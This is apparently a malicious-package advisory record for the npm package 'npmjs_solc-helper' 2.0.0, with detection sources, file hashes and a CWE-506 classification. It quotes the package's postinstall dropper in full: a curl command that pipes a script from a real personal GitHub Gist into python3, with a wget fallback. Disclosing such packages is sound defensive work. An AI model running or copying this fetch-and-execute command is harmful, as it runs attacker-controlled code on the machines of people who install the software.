-= Per source details. Do not edit below this line.=-
The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3, with a wget fallback to the same Gist. On npm install, the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account (guellemilb) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.
The OpenSSF Package Analysis project identified 'npmjs_solc-helper' @ 2.0.0 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"modified_time": "2026-05-13T23:23:15Z",
"versions": [
"2.0.0"
],
"sha256": "403dac6f4c0356afdc379cd24298b168012c1724a7c165a256b0ea53c06b7560",
"source": "ossf-package-analysis",
"import_time": "2026-05-14T06:10:08.926792109Z"
},
{
"modified_time": "2026-05-14T19:24:36Z",
"versions": [
"2.0.0"
],
"sha256": "b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71",
"id": "IN-MAL-2026-002633",
"source": "amazon-inspector",
"import_time": "2026-05-15T07:37:15.143784282Z"
}
]
}
{
"evidence_files": [
{
"sha256": "88771929bf40922648864facfcd7dfee94ad8203d65b72d80aa1b455e355360d",
"tlsh": "87219ef2c9149c731bc905943f289349b173c8679e8078586262825d8bde5ab137bf7d",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-bNks1pp8miUtwRcFC73Ec2L787gGXJN7fypTaQ9UbPCacCqWFCw7mZx0cByzv6Pu7J3M4IIPoxQdSXYt3Pfukg==",
"sha1": "995e0b03be1a496c956907057394e428b484f720"
},
"filename": "npmjs_solc-helper-2.0.0.tgz"
}
]
}
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npmjs_solc-helper/MAL-2026-3723.json"